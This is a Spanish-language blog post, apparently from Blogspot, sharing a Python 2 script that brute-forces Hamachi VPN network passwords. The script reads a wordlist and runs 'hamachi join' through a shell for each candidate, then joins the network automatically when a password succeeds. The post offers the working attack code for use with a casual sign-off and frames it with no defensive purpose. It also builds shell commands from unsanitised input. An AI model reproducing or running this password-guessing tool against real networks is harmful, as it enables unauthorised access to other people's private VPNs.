Como eso de tomar litro y medio de café (aprox) no deja nada bueno, me puse a hacer este pequeño código, es un bruteforce para Hamachi, esta hecho en python, funciona con un wordlist y mediante argv, la forma de ejecutarlo es la siguiente:
python hamachibf.py nombredered /ruta/archivo/wordlistpass.txt
El script esta probado en linux, sobre windows no se si funcione (no creo) ya que utilizo la forma de ingresar a una red en hamachi desde consola por linux, y no se si en windows sea igual, en caso de que si sea lo mismo, pues funcionaría :P
Si encuentra el password los va a loguear de manera automática a la red.
Dejo una captura de pantalla, el codigo, el enlace para pastebin y creo que nada más :P
#!/usr/bin/python
import socket
import urllib2
import sys
import os
import string
import urllib
import re
import subprocess
class Command(object):
def __init__(self, command):
self.command = command
def run(self, shell=True):
import subprocess as sp
process = sp.Popen(self.command, shell = shell, stdout = sp.PIPE, stderr = sp.PIPE)
self.pid = process.pid
self.output, self.error = process.communicate()
self.failed = process.returncode
return self
@property
def returncode(self):
return self.failed
print '|-----| Komtec1 komtec1[at]gmail[dot]com |------|'
print '|-----| Hamachi password bruteforce |------|'
red = sys.argv[1]
archivo = sys.argv[2]
num = 0
try:
f = open(archivo)
print 'Todo bien, sigamos con el code'
except :
print 'No se puede leer el archivo'
#resultado = os.system('ls /home')
while True:
linea = f.readline()
if not linea: break
resultado = Command('hamachi join ' + red + ' ' + linea).run()
res2 = resultado.output
if res2.find("failed") >= 0:
print resultado.output + ' pass: ' + linea
else:
print 'Password encontrado: ' + linea
sys.exit(0)
PD recuerden que blogspot no respeta algunas veces la identación/sangrado, por lo que recomiendo lo vean en pastebin
Espero les funcione para algo! :P
Saludos!
Komtec1
Comentarios